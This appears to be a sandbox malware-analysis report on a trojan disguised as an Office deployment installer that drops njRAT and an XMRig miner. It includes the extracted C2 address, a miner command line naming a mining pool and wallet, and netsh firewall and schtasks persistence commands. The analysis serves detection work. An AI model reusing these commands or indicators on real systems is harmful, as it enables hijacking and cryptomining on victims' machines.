Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01/02/2025, 17:48
Static task
static1
Behavioral task
behavioral1
Sample
officedeploymenttool_18227-20162.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
officedeploymenttool_18227-20162.exe
Resource
win10v2004-20250129-en
General
-
Target
officedeploymenttool_18227-20162.exe
-
Size
37.5MB
-
MD5
d85711a9d52862c3e538d79217244059
-
SHA1
3ed74e38b09b34db3add5fb2c1f4debb66651987
-
SHA256
b84d06eb8b490a54bdd252a58d25eb54f5580018ecbf3066e0cd5d03ef284c96
-
SHA512
7858369ea6aead310ce6524699301958167914453e7d83849b62088e58c8ef318a75e14da637434340f15e01acbe623337a7d1a06e15ea18c3c32b15d8e843ae
-
SSDEEP
786432:vhP/Hle221VnfaWCXcbWDMzISiBddts4s0ACgz27e6fg8/KQxg6U5SeE+nz2E:vBlVsCFhDMzwds4s0oZ+g8CQxfYX6
Malware Config
Extracted
njrat
0.7d
Cyka
mj2025.ddns.net:5552
c6c0c67fa02a1b5dbba63788457d850d
-
reg_key
c6c0c67fa02a1b5dbba63788457d850d
-
splitter
|'|'|
Signatures
-
Njrat family
-
Xmrig family
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/3020-3175-0x0000000000210000-0x0000000000D21000-memory.dmp xmrig behavioral1/memory/3020-3176-0x0000000000210000-0x0000000000D21000-memory.dmp xmrig -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1836 netsh.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6c0c67fa02a1b5dbba63788457d850d.exe GameSDK.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6c0c67fa02a1b5dbba63788457d850d.exe GameSDK.exe -
Executes dropped EXE 17 IoCs
pid Process 1864 svchost.exe 2324 svchost.exe 2728 Stable_Network.exe 2860 Runtime Broker.exe 1180 Process not Found 2676 CL_Debug_Log.txt 648 GameSDK.exe 1500 Antimalware Service Executable.exe 2000 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 1208 Antimalware Service Executable.exe 1136 tor.exe 2248 Antimalware Service Executable.exe 2616 Antimalware Service Executable.exe 1728 Antimalware Service Executable.exe 2688 Antimalware Service Executable.exe 2804 Antimalware Service Executable.exe -
Loads dropped DLL 20 IoCs
pid Process 2536 officedeploymenttool_18227-20162.exe 2324 svchost.exe 2536 officedeploymenttool_18227-20162.exe 2536 officedeploymenttool_18227-20162.exe 2536 officedeploymenttool_18227-20162.exe 1180 Process not Found 2728 Stable_Network.exe 2860 Runtime Broker.exe 2860 Runtime Broker.exe 1472 taskeng.exe 1088 Process not Found 2344 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 1136 tor.exe 1136 tor.exe 1136 tor.exe 1136 tor.exe 1136 tor.exe 1136 tor.exe 2036 Process not Found -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\c6c0c67fa02a1b5dbba63788457d850d = "\"C:\\Users\\Admin\\GameSDK.exe\" .." GameSDK.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\c6c0c67fa02a1b5dbba63788457d850d = "\"C:\\Users\\Admin\\GameSDK.exe\" .." GameSDK.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00060000000171a8-30.dat autoit_exe behavioral1/files/0x0005000000018683-78.dat autoit_exe behavioral1/files/0x000d000000018676-81.dat autoit_exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2344 set thread context of 1208 2344 Antimalware Service Executable.exe 47 PID 2344 set thread context of 2248 2344 Antimalware Service Executable.exe 51 PID 2344 set thread context of 3020 2344 Antimalware Service Executable.exe 53 -
resource yara_rule behavioral1/files/0x0007000000016d5e-24.dat upx behavioral1/memory/2324-26-0x000007FEF5540000-0x000007FEF59A6000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0007000000012117-5.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Runtime Broker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Stable_Network.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CL_Debug_Log.txt Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GameSDK.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language officedeploymenttool_18227-20162.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\CCJBVTGQ\root\CIMV2 Stable_Network.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\CCJBVTGQ\root\CIMV2 Antimalware Service Executable.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2804 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeRestorePrivilege 2676 CL_Debug_Log.txt Token: 35 2676 CL_Debug_Log.txt Token: SeSecurityPrivilege 2676 CL_Debug_Log.txt Token: SeSecurityPrivilege 2676 CL_Debug_Log.txt Token: SeRestorePrivilege 1208 Antimalware Service Executable.exe Token: 35 1208 Antimalware Service Executable.exe Token: SeSecurityPrivilege 1208 Antimalware Service Executable.exe Token: SeSecurityPrivilege 1208 Antimalware Service Executable.exe Token: SeDebugPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: SeRestorePrivilege 2248 Antimalware Service Executable.exe Token: 35 2248 Antimalware Service Executable.exe Token: SeSecurityPrivilege 2248 Antimalware Service Executable.exe Token: SeSecurityPrivilege 2248 Antimalware Service Executable.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: SeLockMemoryPrivilege 3020 attrib.exe Token: SeLockMemoryPrivilege 3020 attrib.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe Token: 33 648 GameSDK.exe Token: SeIncBasePriorityPrivilege 648 GameSDK.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2000 Antimalware Service Executable.exe 2000 Antimalware Service Executable.exe 2000 Antimalware Service Executable.exe 1500 Antimalware Service Executable.exe 1500 Antimalware Service Executable.exe 1500 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 3020 attrib.exe 2616 Antimalware Service Executable.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 2728 Stable_Network.exe 2728 Stable_Network.exe 2728 Stable_Network.exe 2000 Antimalware Service Executable.exe 2000 Antimalware Service Executable.exe 2000 Antimalware Service Executable.exe 1500 Antimalware Service Executable.exe 1500 Antimalware Service Executable.exe 1500 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 2344 Antimalware Service Executable.exe 2616 Antimalware Service Executable.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2536 wrote to memory of 1864 2536 officedeploymenttool_18227-20162.exe 30 PID 2536 wrote to memory of 1864 2536 officedeploymenttool_18227-20162.exe 30 PID 2536 wrote to memory of 1864 2536 officedeploymenttool_18227-20162.exe 30 PID 2536 wrote to memory of 1864 2536 officedeploymenttool_18227-20162.exe 30 PID 1864 wrote to memory of 2324 1864 svchost.exe 31 PID 1864 wrote to memory of 2324 1864 svchost.exe 31 PID 1864 wrote to memory of 2324 1864 svchost.exe 31 PID 2536 wrote to memory of 2728 2536 officedeploymenttool_18227-20162.exe 32 PID 2536 wrote to memory of 2728 2536 officedeploymenttool_18227-20162.exe 32 PID 2536 wrote to memory of 2728 2536 officedeploymenttool_18227-20162.exe 32 PID 2536 wrote to memory of 2728 2536 officedeploymenttool_18227-20162.exe 32 PID 2536 wrote to memory of 2860 2536 officedeploymenttool_18227-20162.exe 33 PID 2536 wrote to memory of 2860 2536 officedeploymenttool_18227-20162.exe 33 PID 2536 wrote to memory of 2860 2536 officedeploymenttool_18227-20162.exe 33 PID 2536 wrote to memory of 2860 2536 officedeploymenttool_18227-20162.exe 33 PID 2728 wrote to memory of 2676 2728 Stable_Network.exe 35 PID 2728 wrote to memory of 2676 2728 Stable_Network.exe 35 PID 2728 wrote to memory of 2676 2728 Stable_Network.exe 35 PID 2728 wrote to memory of 2676 2728 Stable_Network.exe 35 PID 2860 wrote to memory of 648 2860 Runtime Broker.exe 37 PID 2860 wrote to memory of 648 2860 Runtime Broker.exe 37 PID 2860 wrote to memory of 648 2860 Runtime Broker.exe 37 PID 2860 wrote to memory of 648 2860 Runtime Broker.exe 37 PID 2728 wrote to memory of 2824 2728 Stable_Network.exe 38 PID 2728 wrote to memory of 2824 2728 Stable_Network.exe 38 PID 2728 wrote to memory of 2824 2728 Stable_Network.exe 38 PID 2728 wrote to memory of 2824 2728 Stable_Network.exe 38 PID 2824 wrote to memory of 2804 2824 cmd.exe 40 PID 2824 wrote to memory of 2804 2824 cmd.exe 40 PID 2824 wrote to memory of 2804 2824 cmd.exe 40 PID 2824 wrote to memory of 2804 2824 cmd.exe 40 PID 648 wrote to memory of 1836 648 GameSDK.exe 42 PID 648 wrote to memory of 1836 648 GameSDK.exe 42 PID 648 wrote to memory of 1836 648 GameSDK.exe 42 PID 648 wrote to memory of 1836 648 GameSDK.exe 42 PID 1472 wrote to memory of 1500 1472 taskeng.exe 44 PID 1472 wrote to memory of 1500 1472 taskeng.exe 44 PID 1472 wrote to memory of 1500 1472 taskeng.exe 44 PID 1472 wrote to memory of 2000 1472 taskeng.exe 45 PID 1472 wrote to memory of 2000 1472 taskeng.exe 45 PID 1472 wrote to memory of 2000 1472 taskeng.exe 45 PID 2000 wrote to memory of 2344 2000 Antimalware Service Executable.exe 46 PID 2000 wrote to memory of 2344 2000 Antimalware Service Executable.exe 46 PID 2000 wrote to memory of 2344 2000 Antimalware Service Executable.exe 46 PID 2344 wrote to memory of 1208 2344 Antimalware Service Executable.exe 47 PID 2344 wrote to memory of 1208 2344 Antimalware Service Executable.exe 47 PID 2344 wrote to memory of 1208 2344 Antimalware Service Executable.exe 47 PID 2344 wrote to memory of 1208 2344 Antimalware Service Executable.exe 47 PID 2344 wrote to memory of 1208 2344 Antimalware Service Executable.exe 47 PID 2344 wrote to memory of 1136 2344 Antimalware Service Executable.exe 50 PID 2344 wrote to memory of 1136 2344 Antimalware Service Executable.exe 50 PID 2344 wrote to memory of 1136 2344 Antimalware Service Executable.exe 50 PID 2344 wrote to memory of 2248 2344 Antimalware Service Executable.exe 51 PID 2344 wrote to memory of 2248 2344 Antimalware Service Executable.exe 51 PID 2344 wrote to memory of 2248 2344 Antimalware Service Executable.exe 51 PID 2344 wrote to memory of 2248 2344 Antimalware Service Executable.exe 51 PID 2344 wrote to memory of 2248 2344 Antimalware Service Executable.exe 51 PID 2344 wrote to memory of 3020 2344 Antimalware Service Executable.exe 53 PID 2344 wrote to memory of 3020 2344 Antimalware Service Executable.exe 53 PID 2344 wrote to memory of 3020 2344 Antimalware Service Executable.exe 53 PID 2344 wrote to memory of 3020 2344 Antimalware Service Executable.exe 53 PID 2344 wrote to memory of 3020 2344 Antimalware Service Executable.exe 53 PID 1472 wrote to memory of 2616 1472 taskeng.exe 56 PID 1472 wrote to memory of 2616 1472 taskeng.exe 56 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3020 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\officedeploymenttool_18227-20162.exe"C:\Users\Admin\AppData\Local\Temp\officedeploymenttool_18227-20162.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2324
-
-
-
C:\ProgramData\Stable_Network.exe"C:\ProgramData\Stable_Network.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtC:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2804
-
-
-
-
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Users\Admin\GameSDK.exe"C:\Users\Admin\GameSDK.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\GameSDK.exe" "GameSDK.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1836
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {37ABD51F-7509-46CD-8CD4-DB3EC1CD530F} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1500
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck381423⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1136
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\attrib.exe-o stratum+tcp://pool.supportxmr.com:3333 -u 428jMEBAdSKHQGHrnDMJzK16oJ1irAGkEgLZrhkJjNSxfsHQ8cpLn8QBAQWcpodf7bjFLt1wQHbJ8JNg3Em5EspB1MsE9zY -p x -t 44⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Views/modifies file attributes
PID:3020
-
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
PID:1728
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2616
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
PID:2804
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck2⤵
- Executes dropped EXE
PID:2688
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15.9MB
MD5a1a51313f8d07d2eb4ca0123108094e1
SHA14024e60d52e4c992596b73cb205ea7b4a1a91ae0
SHA2568753515f422c81bf9bf921d9857f5f7ee0b3f47573e84129092e095147eebd63
SHA5123a43cdaae6d988f935f4092d5a9a4eb3cf2f2230d438858a3dc24eec6b050c21c1844f899b60fc69ed3d34b76f2f4057b82e8730f149b0103628af7219392e4d
-
Filesize
7.4MB
MD5f71859e5750415fb32eb045e58635cae
SHA1fa70d2a35caeb0c12214775cad8cdd8ff0583b59
SHA2568d668f74825fd8cf5809d9c63e36084bd04d672585fb1f5cdda429e052b8488e
SHA512423bc36ec4d2b811aa54685a70d5b9daad21d31e95759b1437b7b1966bcdd05d322a76c4288dc647b35bd4b1f6acc0c692fa4ba365715e55671da4edef65df1f
-
Filesize
8.4MB
MD54f19535079b64da77ce91d429cfbcfdc
SHA168b4d4679024111b246c45328db9478f3a67a709
SHA256fc02c6319cc5b32536a4b1773a5aba82c213fed6de3249d117b2c8ffe5c82b58
SHA512fcea894e6a00384c4af0d5abd8143a72b122c6e3052b602ee4a150c89b538e4ac5f76dcbc01770548dba6ef67dd13420450d368bfb42ddcf4fd11995181382dc
-
Filesize
14.6MB
MD5053bd8fa3b586bd5b8ee60970c6cae44
SHA1ada9b5270e7025a5438bc0066f68286243db15c7
SHA256e0e342cd6302970770d542d516a02a445c13f1f6a77799342ced658ca4e3f8ad
SHA5120bc717c9bc09ee019662ee3cee795ad5510981d36ca706872f776385b4b98826768c5a5136e592e997383690a0d1634d72d4462a05120550a6e5a3295e5a587c
-
Filesize
2KB
MD546f2f154060d639b1f5f1ceb47ba9574
SHA16bdee2c266f48415b9d580801fea16a9d43faa25
SHA256a08b36bde4948ac2878d5aaaad2e2cacf0ed2b1fde097b9c6ae2d777843b1d4f
SHA512752e3042d9e3b50748d4075aca84ab61a975dad6be1d5c1ef6d807e8933048e75221ea0babf935b1aee778bad3f51374ca3984418cb4587d5f2e1de45b07f7a1
-
Filesize
1.4MB
MD572c65de0cc88d6a26d5a7040aaf1fb60
SHA168dae332ade43106c72e68a497b6b7df6b314425
SHA256769f20bcec63eb6567cca095ea59ffcda2c87e2b8600503f0e4f976dfb8da2bb
SHA5125f658e0bee185613a37f946069ac6723fff93e542a4eb6e3435766c58d09d82894b85502f1686ffc9318bdf4b3a858490866ca56b90238c8c903e794c3a4e3fb
-
Filesize
14.6MB
MD55aa219d1ea73f71f39e2b4cf09f84787
SHA166c996348e41aa32686d5eb9389dfc4dcbdf6acb
SHA25648e152a15e74d7d397fe6f51a9b183091352930e695b56d3a0d3ee80197664b0
SHA51277426e81f92479c930d221c4e6c5397027b2f1036895eb42a374674cd73d7ed8c1df59ec7adbdbff2ce67c15a8ded2f59db9349804df59921daab15cd1bbbe72
-
Filesize
11KB
MD5fd7347ad0c32a9a3ead2cd93a4f19b5a
SHA1b467f72895fc5050824be544f5392635a90f92e7
SHA256bc20bfedf9ce9e927cebae94b9512814fba026f341bcdaf0db28f640064eb472
SHA5123ae0836fc45484b43c52183023c7bc992421e2edac5613cfb3b4d7f78fc2870c699681f04700f42b9a92ad19db8bcd67c62d0de79b6055c1a5a3d4d482532e2f
-
Filesize
2.6MB
MD521e3778b11e03ced442a1ac73d8949ee
SHA19e416a029a3c6e6738cba0d1f69253ca283b73ea
SHA25603b7f47481eaf1f2c942f4a41a3a6411e22493c2d5b25ab1cab38ffe11cccb76
SHA51220b91dea4e9f8f9dc8b672be51fb161f1b7a60fac9523921bc084f64c684f688070ec0e01c93f57294a7b13f5ecd33f9eac0eb22acd65b528162bfb08d0bd1a9
-
Filesize
15.8MB
MD57268eb05d51294219569569ea006da2a
SHA1ade2c0a248f6aae9ff00f42e04dd3d1de242b289
SHA256188b7e3f0135cf683c393ab88930e93f29d4a0c31c08841237afaf543ecb2e12
SHA5120056df445e950fc3a76dcb64c4ab8c8b187436d18e95b916b7e83e7e215fa8371bae91501252b1a6e15dbc5414ae674381b758c84a2814d4c88bd856e3deef46
-
Filesize
2.5MB
MD554183220aa6c777f8228474ff5b5df01
SHA1ed438f17bffb37d42afd61d8dcef0c50d554c65c
SHA2569a78c80e93bd1ed3d71eb090465e39a69470cd1812fc5e169d8b412e8c665963
SHA51270b1e22449c5264bed46b62595206e3ad36e2a9c33fa9589acb792d499dcbbae5ebdbf3b35c140e72a7d594f807a6ce1ab925736b5e1a07c17a26445a2591987
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs
Filesize15KB
MD5eeeec99015522fca6424ca5390c2495f
SHA11cd30aa901a7b600b1681751231d4afdec70adf1
SHA256c2122a3c51d15aedc5d791f549b22bc17f8d292e835367f6cf4f637cb5dea45a
SHA512afe372db05d85d22372514a1bb55bad19f2cbd02bc29ec81c019e79367f07de702b5645cc2d916605c5b2bc76cd1032aed047a02f3840f5c570974d29df25e42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus.tmp
Filesize2.8MB
MD5f86384a91741548d0fe0ba7a7435c977
SHA164e553ab8be1952445522a2ab50985d0c28ccdbc
SHA256a159efad2d96e0b5e263af15926881cbe94a3c9049ee13ab2eab2eff878948e1
SHA5126034604ad0e53e0cec0b58be8b7578c32af882b51871e9e80597c3fd4cc32faec29d1890412f502976da6bd8cea650476abe305ecc4e83d62ee1ceb32f7687d3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new
Filesize10.8MB
MD5b0447744e17ca5f7ab780b88f357595a
SHA1881066602f4f906da22f2110ee9b51549b40a652
SHA2562c57727525f74ab26c517bd5454cff156c9ca0b6f041b5faec2c94f904e1df90
SHA512ea3b86a33b40879dfea96d3dd274a6bd41042eded8c0a85502b24beb308696306cdf9d76dd142c90155bc3b620550c0d30d5f84dc1a18ee4b11b53303bd325ba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new
Filesize21.4MB
MD5aacf9cd6b9e25d4ab3c6a131bc8ba7c8
SHA10925139ce6bcd39834d047091425f2783b920e72
SHA256d3a4aa0e2883f36a9756a1d89e91c793709efa18d1d0228de1f5e69dc75794f4
SHA51206a259866bf53499face69a7fd24799b9de166ee72b81b5e6202d3b143faeae3008af56f21aa9dc38742c3f2c339873156dbcb0cecc35143ea9d661980acd6bf
-
Filesize
3KB
MD51fedbf67648fc6d5813585159e590d48
SHA159fec7d9df80b32f12742395314a9b948d640a9d
SHA2567ba9749a131e0a55ec2b368b4673f1535597add17dde357af08423db1aa8bdfc
